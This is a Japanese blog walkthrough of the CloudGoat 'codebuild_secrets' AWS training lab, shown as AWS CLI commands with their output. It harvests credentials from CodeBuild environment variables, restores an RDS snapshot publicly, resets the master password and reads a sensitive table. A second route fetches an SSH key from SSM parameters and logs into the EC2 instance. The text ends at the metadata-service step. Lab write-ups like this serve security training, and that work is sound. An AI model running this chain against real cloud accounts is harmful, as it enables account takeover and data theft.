AWSの攻撃体験ツール【Cloudgoat】全シナリオやる(後編)
前編、中編はこちら。
codebuild_secrets (Large / Hard)
このシナリオには二つのルートがある。
IAMユーザーSoloから始め、CodeBuildを調査してユーザーCalrissianの認証情報を得、CalrissianとしてRDSのスナップショットを利用するルートと、SSMパラメータからインスタンスのSSHキーを取得し、メタデータを利用してインスタンスプロファイルのキーを取得して、隠された情報を得るルート。
初期情報は下記。
Outputs: cloudgoat_output_aws_account_id = 7*********** cloudgoat_output_solo_access_key_id = A************** cloudgoat_output_solo_secret_key = 1***************************
CodeBuildを調査する。
AWS CodeBuild のコマンドラインリファレンス - AWS CodeBuild
% aws codebuild list-projects --profile Solo --region us-east-1 { "projects": [ "cg-codebuild-cgidysjfe61q7i" ] } % aws codebuild batch-get-projects --names cg-codebuild-cgidysjfe61q7i --profile Solo --region us-east-1 { "projects": [ { "name": "cg-codebuild-cgidysjfe61q7i", "arn": "arn:aws:codebuild:us-east-1:746321857124:project/cg-codebuild-cgidysjfe61q7i", "source": { "type": "NO_SOURCE", "gitCloneDepth": 0, "buildspec": "version: 0.2\n\nphases:\n pre_build:\n commands:\n - echo \"This is CloudGoat's simpliest buildspec file ever (maybe)\"", "insecureSsl": false }, "artifacts": { "type": "NO_ARTIFACTS", "overrideArtifactName": false }, "cache": { "type": "NO_CACHE" }, "environment": { "type": "LINUX_CONTAINER", "image": "aws/codebuild/standard:1.0", "computeType": "BUILD_GENERAL1_SMALL", "environmentVariables": [ { "name": "calrissian-aws-access-key", "value": "A**************", "type": "PLAINTEXT" }, { "name": "calrissian-aws-secret-key", "value": "n***************************", "type": "PLAINTEXT" } ], "privilegedMode": false, "imagePullCredentialsType": "CODEBUILD" }, "serviceRole": "arn:aws:iam::7***********:role/code-build-cg-cgidysjfe61q7i-service-role", "timeoutInMinutes": 20, "queuedTimeoutInMinutes": 480, "encryptionKey": "arn:aws:kms:us-east-1:7***********:alias/aws/s3", "tags": [ { "key": "Name", "value": "cg-codebuild-cgidysjfe61q7i" }, { "key": "Scenario", "value": "codebuild-secrets" }, { "key": "Stack", "value": "CloudGoat" } ], "created": "2021-01-07T13:41:45.738000+09:00", "lastModified": "2021-01-07T13:41:45.738000+09:00", "badge": { "badgeEnabled": false }, "logsConfig": { "cloudWatchLogs": { "status": "ENABLED" }, "s3Logs": { "status": "DISABLED", "encryptionDisabled": false } } } ], "projectsNotFound": [] }
環境変数としてCalrissianの認証情報が入っているので使う。
% aws configure --profile Calrissian AWS Access Key ID [None]: A************** AWS Secret Access Key [None]: n*************************** Default region name [None]: us-east-1 Default output format [None]:
RDSの調査。
% aws rds describe-db-instances --profile Calrissian { "DBInstances": [ { "DBInstanceIdentifier": "cg-rds-instance-cgidysjfe61q7i", "DBInstanceClass": "db.t2.micro", "Engine": "postgres", "DBInstanceStatus": "available", "MasterUsername": "cgadmin", "DBName": "securedb", "Endpoint": { "Address": "cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com", "Port": 5432, "HostedZoneId": "Z2R2ITUGPM61AM" }, "AllocatedStorage": 20, "InstanceCreateTime": "2021-01-07T04:45:19.334000+00:00", "PreferredBackupWindow": "07:38-08:08", "BackupRetentionPeriod": 0, "DBSecurityGroups": [], "VpcSecurityGroups": [ { "VpcSecurityGroupId": "sg-09e426a8cb9f31e8a", "Status": "active" } ], "DBParameterGroups": [ { "DBParameterGroupName": "default.postgres9.6", "ParameterApplyStatus": "in-sync" } ], "AvailabilityZone": "us-east-1b", "DBSubnetGroup": { "DBSubnetGroupName": "cloud-goat-rds-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0b887402790487154", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-0207674e01d5abb99", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ] }, (snip) "TagList": [ { "Key": "Name", "Value": "cg-rds-instance-cgidysjfe61q7i" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Stack", "Value": "CloudGoat" } ] } ] }
スナップショットをとってからアクセス可能な領域にリストアし、そのインスタンスへ接続することを目指す。
上記インスタンスはprivateらしきサブネットグループにあることと、別でpublicらしきサブネットグループがあることがわかる。
(private、publicはサブネットグループの説明から、もしくはsubnetのタグから予測)
subnet情報を見る場合はCalrissianではなくSoloの権限で実行する必要がある。
% aws rds describe-db-subnet-groups --profile Calrissian { "DBSubnetGroups": [ { "DBSubnetGroupName": "cloud-goat-rds-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0b887402790487154", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-0207674e01d5abb99", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ], "DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:cloud-goat-rds-subnet-group-cgidysjfe61q7i" }, { "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0ff83f3eceab80bba", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-04e2754b6ac56dabe", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ], "DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i" }, { "DBSubnetGroupName": "default", "DBSubnetGroupDescription": "default", "VpcId": "vpc-116d946c", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-24a40d7b", "SubnetAvailabilityZone": { "Name": "us-east-1d" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-2d6fc40c", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-6316e652", "SubnetAvailabilityZone": { "Name": "us-east-1e" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-5c03ae3a", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-0d640203", "SubnetAvailabilityZone": { "Name": "us-east-1f" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-e5502ca8", "SubnetAvailabilityZone": { "Name": "us-east-1c" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ], "DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:default" } ] } % aws ec2 describe-subnets --profile Solo --region us-east-1 { "Subnets": [ { "AvailabilityZone": "us-east-1c", "AvailabilityZoneId": "use1-az4", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.16.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-e5502ca8", "VpcId": "vpc-116d946c", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-e5502ca8" }, { "AvailabilityZone": "us-east-1f", "AvailabilityZoneId": "use1-az5", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.64.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-0d640203", "VpcId": "vpc-116d946c", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0d640203" }, { "AvailabilityZone": "us-east-1a", "AvailabilityZoneId": "use1-az1", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.0.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-5c03ae3a", "VpcId": "vpc-116d946c", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-5c03ae3a" }, { "AvailabilityZone": "us-east-1a", "AvailabilityZoneId": "use1-az1", "AvailableIpAddressCount": 250, "CidrBlock": "10.10.10.0/24", "DefaultForAz": false, "MapPublicIpOnLaunch": false, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-04e2754b6ac56dabe", "VpcId": "vpc-0d54cc644cc046bf5", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "Tags": [ { "Key": "Stack", "Value": "CloudGoat" }, { "Key": "Name", "Value": "CloudGoat cgidysjfe61q7i Public Subnet #1" }, { "Key": "Scenario", "Value": "codebuild-secrets" } ], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-04e2754b6ac56dabe" }, { "AvailabilityZone": "us-east-1e", "AvailabilityZoneId": "use1-az3", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.48.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-6316e652", "VpcId": "vpc-116d946c", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-6316e652" }, { "AvailabilityZone": "us-east-1a", "AvailabilityZoneId": "use1-az1", "AvailableIpAddressCount": 251, "CidrBlock": "10.10.30.0/24", "DefaultForAz": false, "MapPublicIpOnLaunch": false, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-0b887402790487154", "VpcId": "vpc-0d54cc644cc046bf5", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "Tags": [ { "Key": "Stack", "Value": "CloudGoat" }, { "Key": "Name", "Value": "CloudGoat cgidysjfe61q7i Private Subnet #1" }, { "Key": "Scenario", "Value": "codebuild-secrets" } ], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0b887402790487154" }, { "AvailabilityZone": "us-east-1b", "AvailabilityZoneId": "use1-az2", "AvailableIpAddressCount": 250, "CidrBlock": "10.10.40.0/24", "DefaultForAz": false, "MapPublicIpOnLaunch": false, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-0207674e01d5abb99", "VpcId": "vpc-0d54cc644cc046bf5", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "Tags": [ { "Key": "Stack", "Value": "CloudGoat" }, { "Key": "Name", "Value": "CloudGoat cgidysjfe61q7i Private Subnet #2" }, { "Key": "Scenario", "Value": "codebuild-secrets" } ], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0207674e01d5abb99" }, { "AvailabilityZone": "us-east-1b", "AvailabilityZoneId": "use1-az2", "AvailableIpAddressCount": 250, "CidrBlock": "10.10.20.0/24", "DefaultForAz": false, "MapPublicIpOnLaunch": false, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-0ff83f3eceab80bba", "VpcId": "vpc-0d54cc644cc046bf5", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "Tags": [ { "Key": "Name", "Value": "CloudGoat cgidysjfe61q7i Public Subnet #2" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Stack", "Value": "CloudGoat" } ], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0ff83f3eceab80bba" }, { "AvailabilityZone": "us-east-1b", "AvailabilityZoneId": "use1-az2", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.80.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-2d6fc40c", "VpcId": "vpc-116d946c", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-2d6fc40c" }, { "AvailabilityZone": "us-east-1d", "AvailabilityZoneId": "use1-az6", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.32.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-24a40d7b", "VpcId": "vpc-116d946c", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-24a40d7b" } ] }
publicなサブネットグループにDBをリストアする。
% aws rds restore-db-instance-from-db-snapshot --db-instance-identifier newinstance1 --db-snapshot-identifier snapshot1 --db-subnet-group-name cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i --publicly-accessible --profile Calrissian { "DBInstance": { "DBInstanceIdentifier": "newinstance1", "DBInstanceClass": "db.t2.micro", "Engine": "postgres", "DBInstanceStatus": "creating", "MasterUsername": "cgadmin", "DBName": "securedb", "AllocatedStorage": 20, "PreferredBackupWindow": "07:38-08:08", "BackupRetentionPeriod": 0, "DBSecurityGroups": [], "VpcSecurityGroups": [ { "VpcSecurityGroupId": "sg-0097b2cef3e219411", "Status": "active" } ], "DBParameterGroups": [ { "DBParameterGroupName": "default.postgres9.6", "ParameterApplyStatus": "in-sync" } ], "DBSubnetGroup": { "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0ff83f3eceab80bba", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-04e2754b6ac56dabe", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ] }, "PreferredMaintenanceWindow": "mon:04:03-mon:04:33", "PendingModifiedValues": {}, "MultiAZ": false, "EngineVersion": "9.6.19", "AutoMinorVersionUpgrade": true, "ReadReplicaDBInstanceIdentifiers": [], "LicenseModel": "postgresql-license", "OptionGroupMemberships": [ { "OptionGroupName": "default:postgres-9-6", "Status": "pending-apply" } ], "PubliclyAccessible": true, "StorageType": "gp2", "DbInstancePort": 0, "StorageEncrypted": false, "DbiResourceId": "db-5MMRXQLGIES4ZGGKRQSEBHLR3Q", "CACertificateIdentifier": "rds-ca-2019", "DomainMemberships": [], "CopyTagsToSnapshot": false, "MonitoringInterval": 0, "DBInstanceArn": "arn:aws:rds:us-east-1:7***********:db:newinstance1", "IAMDatabaseAuthenticationEnabled": false, "PerformanceInsightsEnabled": false, "DeletionProtection": false, "AssociatedRoles": [], "TagList": [ { "Key": "Name", "Value": "cg-rds-instance-cgidysjfe61q7i" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Stack", "Value": "CloudGoat" } ] } }
リストアしたDBにはデフォルトのセキュリティグループが適用されるため、付け替えを行う。
cg-rds-psql-cgidysjfe61q7i(sg-09e426a8cb9f31e8a)にすればよさそう。
% aws ec2 describe-security-groups --profile Calrissian { "SecurityGroups": [ { "Description": "default VPC security group", "GroupName": "default", "IpPermissions": [ { "IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [ { "GroupId": "sg-0097b2cef3e219411", "UserId": "7***********" } ] } ], "OwnerId": "7***********", "GroupId": "sg-0097b2cef3e219411", "IpPermissionsEgress": [ { "IpProtocol": "-1", "IpRanges": [ { "CidrIp": "0.0.0.0/0" } ], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [] } ], "VpcId": "vpc-0d54cc644cc046bf5" }, { "Description": "CloudGoat cgidysjfe61q7i Security Group for EC2 Instance over SSH", "GroupName": "cg-ec2-ssh-cgidysjfe61q7i", "IpPermissions": [ { "FromPort": 22, "IpProtocol": "tcp", "IpRanges": [ { "CidrIp": "**.**.**.**/32" } ], "Ipv6Ranges": [], "PrefixListIds": [], "ToPort": 22, "UserIdGroupPairs": [] } ], "OwnerId": "7***********", "GroupId": "sg-07844914cbfefc7ce", "IpPermissionsEgress": [ { "IpProtocol": "-1", "IpRanges": [ { "CidrIp": "0.0.0.0/0" } ], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [] } ], "Tags": [ { "Key": "Stack", "Value": "CloudGoat" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Name", "Value": "cg-ec2-ssh-cgidysjfe61q7i" } ], "VpcId": "vpc-0d54cc644cc046bf5" }, { "Description": "CloudGoat cgidysjfe61q7i Security Group for PostgreSQL RDS Instance", "GroupName": "cg-rds-psql-cgidysjfe61q7i", "IpPermissions": [ { "FromPort": 5432, "IpProtocol": "tcp", "IpRanges": [ { "CidrIp": "10.10.20.0/24" }, { "CidrIp": "10.10.30.0/24" }, { "CidrIp": "10.10.40.0/24" }, { "CidrIp": "**.**.**.**/32" }, { "CidrIp": "10.10.10.0/24" } ], "Ipv6Ranges": [], "PrefixListIds": [], "ToPort": 5432, "UserIdGroupPairs": [] } ], "OwnerId": "7***********", "GroupId": "sg-09e426a8cb9f31e8a", "IpPermissionsEgress": [ { "IpProtocol": "-1", "IpRanges": [ { "CidrIp": "0.0.0.0/0" } ], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [] } ], "VpcId": "vpc-0d54cc644cc046bf5" }, { "Description": "default VPC security group", "GroupName": "default", "IpPermissions": [ { "IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [ { "GroupId": "sg-0d531a31", "UserId": "7***********" } ] } ], "OwnerId": "7***********", "GroupId": "sg-0d531a31", "IpPermissionsEgress": [ { "IpProtocol": "-1", "IpRanges": [ { "CidrIp": "0.0.0.0/0" } ], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [] } ], "VpcId": "vpc-116d946c" } ] } % aws rds modify-db-instance --db-instance-identifier newinstance1 --vpc-security-group-ids sg-09e426a8cb9f31e8a --profile Calrissian { "DBInstance": { "DBInstanceIdentifier": "newinstance1", "DBInstanceClass": "db.t2.micro", "Engine": "postgres", "DBInstanceStatus": "available", "MasterUsername": "cgadmin", "DBName": "securedb", "Endpoint": { "Address": "newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com", "Port": 5432, "HostedZoneId": "Z2R2ITUGPM61AM" }, "AllocatedStorage": 20, "InstanceCreateTime": "2021-01-14T03:13:42.402000+00:00", "PreferredBackupWindow": "07:38-08:08", "BackupRetentionPeriod": 0, "DBSecurityGroups": [], "VpcSecurityGroups": [ { "VpcSecurityGroupId": "sg-09e426a8cb9f31e8a", "Status": "adding" }, { "VpcSecurityGroupId": "sg-0097b2cef3e219411", "Status": "removing" } ], "DBParameterGroups": [ { "DBParameterGroupName": "default.postgres9.6", "ParameterApplyStatus": "in-sync" } ], "AvailabilityZone": "us-east-1b", "DBSubnetGroup": { "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0ff83f3eceab80bba", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-04e2754b6ac56dabe", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ] }, (snip) "TagList": [ { "Key": "Name", "Value": "cg-rds-instance-cgidysjfe61q7i" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Stack", "Value": "CloudGoat" } ] } }
さらに、マスターパスワードを変更する。
% aws rds modify-db-instance --db-instance-identifier newinstance1 --master-user-password cgpassword --profile Calrissian { "DBInstance": { "DBInstanceIdentifier": "newinstance1", "DBInstanceClass": "db.t2.micro", "Engine": "postgres", "DBInstanceStatus": "available", "MasterUsername": "cgadmin", "DBName": "securedb", "Endpoint": { "Address": "newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com", "Port": 5432, "HostedZoneId": "Z2R2ITUGPM61AM" }, "AllocatedStorage": 20, "InstanceCreateTime": "2021-01-14T03:13:42.402000+00:00", "PreferredBackupWindow": "07:38-08:08", "BackupRetentionPeriod": 0, "DBSecurityGroups": [], "VpcSecurityGroups": [ { "VpcSecurityGroupId": "sg-09e426a8cb9f31e8a", "Status": "active" } ], "DBParameterGroups": [ { "DBParameterGroupName": "default.postgres9.6", "ParameterApplyStatus": "in-sync" } ], "AvailabilityZone": "us-east-1b", "DBSubnetGroup": { "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0ff83f3eceab80bba", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-04e2754b6ac56dabe", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ] }, (snip) "TagList": [ { "Key": "Name", "Value": "cg-rds-instance-cgidysjfe61q7i" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Stack", "Value": "CloudGoat" } ] } }
これでDBに外部から接続可能になったので、接続して情報を窃取するとゴール。
% psql postgresql://cgadmin:cgpassword@newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb psql (13.1, server 9.6.19) SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off) Type "help" for help. securedb=> \dt List of relations Schema | Name | Type | Owner --------+-----------------------+-------+--------- public | sensitive_information | table | cgadmin (1 row) securedb=> select * from sensitive_information; name | value ------+-------------------------------------------- Key1 | V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4 Key2 | V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6 (2 rows)
次に、別ルートを試す。
まず、SSMパラメータを取得すると、鍵の情報が入手できる。
% aws ssm describe-parameters --profile Solo --region us-east-1 { "Parameters": [ { "Name": "cg-ec2-private-key-cgidysjfe61q7i", "Type": "String", "LastModifiedDate": "2021-01-07T13:41:31.423000+09:00", "LastModifiedUser": "arn:aws:iam::7***********:user/cloudgoat", "Description": "cg-ec2-private-key-cgidysjfe61q7i", "Version": 1, "Tier": "Standard", "Policies": [], "DataType": "text" }, { "Name": "cg-ec2-public-key-cgidysjfe61q7i", "Type": "String", "LastModifiedDate": "2021-01-07T13:41:31.263000+09:00", "LastModifiedUser": "arn:aws:iam::7***********:user/cloudgoat", "Description": "cg-ec2-public-key-cgidysjfe61q7i", "Version": 1, "Tier": "Standard", "Policies": [], "DataType": "text" } ] } % aws ssm get-parameter --name cg-ec2-private-key-cgidysjfe61q7i --profile Solo --region us-east-1 { "Parameter": { "Name": "cg-ec2-private-key-cgidysjfe61q7i", "Type": "String", "Value": "(snip)", "Version": 1, "LastModifiedDate": "2021-01-07T13:41:31.423000+09:00", "ARN": "arn:aws:ssm:us-east-1:746321857124:parameter/cg-ec2-private-key-cgidysjfe61q7i", "DataType": "text" } }
上記の鍵をファイルに保存し(改行\nが含まれているため注意)、EC2インスタンスに接続を試みる。
ログインユーザはタグのヒントから、ubuntuで試す。
% aws ec2 describe-instances --profile Solo --region us-east-1 { "Reservations": [ { "Groups": [], "Instances": [ { "AmiLaunchIndex": 0, "ImageId": "ami-0a313d6098716f372", "InstanceId": "i-0b226fe5e8d976a20", "InstanceType": "t2.micro", "KeyName": "cg-ec2-key-pair-cgidysjfe61q7i", "LaunchTime": "2021-01-07T04:45:30+00:00", "Monitoring": { "State": "disabled" }, "Placement": { "AvailabilityZone": "us-east-1a", "GroupName": "", "Tenancy": "default" }, "PrivateDnsName": "ip-10-10-10-218.ec2.internal", "PrivateIpAddress": "10.10.10.218", "ProductCodes": [], "PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com", "PublicIpAddress": "**.**.**.**", "State": { "Code": 16, "Name": "running" }, "StateTransitionReason": "", "SubnetId": "subnet-04e2754b6ac56dabe", "VpcId": "vpc-0d54cc644cc046bf5", "Architecture": "x86_64", "BlockDeviceMappings": [ { "DeviceName": "/dev/sda1", "Ebs": { "AttachTime": "2021-01-07T04:45:31+00:00", "DeleteOnTermination": true, "Status": "attached", "VolumeId": "vol-0db7760111a6a1c8e" } } ], "ClientToken": "011C34A0-6099-4720-82D5-21E17C6D06CC", "EbsOptimized": false, "EnaSupport": true, "Hypervisor": "xen", "IamInstanceProfile": { "Arn": "arn:aws:iam::7***********:instance-profile/cg-ec2-instance-profile-cgidysjfe61q7i", "Id": "AIPA23RB7ZJSAHNQLBENQ" }, "NetworkInterfaces": [ { "Association": { "IpOwnerId": "amazon", "PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com", "PublicIp": "**.**.**.**" }, "Attachment": { "AttachTime": "2021-01-07T04:45:30+00:00", "AttachmentId": "eni-attach-0218ccaedbc85605b", "DeleteOnTermination": true, "DeviceIndex": 0, "Status": "attached" }, "Description": "", "Groups": [ { "GroupName": "cg-ec2-ssh-cgidysjfe61q7i", "GroupId": "sg-07844914cbfefc7ce" } ], "Ipv6Addresses": [], "MacAddress": "02:bc:8d:6e:79:37", "NetworkInterfaceId": "eni-0628f8cf600a5fdba", "OwnerId": "7***********", "PrivateDnsName": "ip-10-10-10-218.ec2.internal", "PrivateIpAddress": "10.10.10.218", "PrivateIpAddresses": [ { "Association": { "IpOwnerId": "amazon", "PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com", "PublicIp": "**.**.**.**" }, "Primary": true, "PrivateDnsName": "ip-10-10-10-218.ec2.internal", "PrivateIpAddress": "10.10.10.218" } ], "SourceDestCheck": true, "Status": "in-use", "SubnetId": "subnet-04e2754b6ac56dabe", "VpcId": "vpc-0d54cc644cc046bf5", "InterfaceType": "interface" } ], "RootDeviceName": "/dev/sda1", "RootDeviceType": "ebs", "SecurityGroups": [ { "GroupName": "cg-ec2-ssh-cgidysjfe61q7i", "GroupId": "sg-07844914cbfefc7ce" } ], "SourceDestCheck": true, "Tags": [ { "Key": "Stack", "Value": "CloudGoat" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Name", "Value": "cg-ubuntu-ec2-cgidysjfe61q7i" } ], "VirtualizationType": "hvm", "CpuOptions": { "CoreCount": 1, "ThreadsPerCore": 1 }, "CapacityReservationSpecification": { "CapacityReservationPreference": "open" }, "HibernationOptions": { "Configured": false }, "MetadataOptions": { "State": "applied", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled" } } ], "OwnerId": "7***********", "ReservationId": "r-0e22e3417125b3155" } ] } % ssh -i private ubuntu@ec2-3-80-10-254.compute-1.amazonaws.com Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-1032-aws x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Fri Jan 15 06:57:23 UTC 2021 System load: 0.0 Processes: 90 Usage of /: 25.8% of 7.69GB Users logged in: 0 Memory usage: 26% IP address for eth0: 10.10.10.218 Swap usage: 0% * Introducing self-healing high availability clusters in MicroK8s. Simple, hardened, Kubernetes for production, from RaspberryPi to DC. https://microk8s.io/high-availability Get cloud support with Ubuntu Advantage Cloud Guest: http://www.ubuntu.com/business/services/cloud * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 105 packages can be updated. 2 updates are security updates. *** System restart required *** The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. ubuntu@ip-10-10-10-218:~$
メタデータサービスから起動時のコマンドを確認すると、DBの接続情報が得られる。
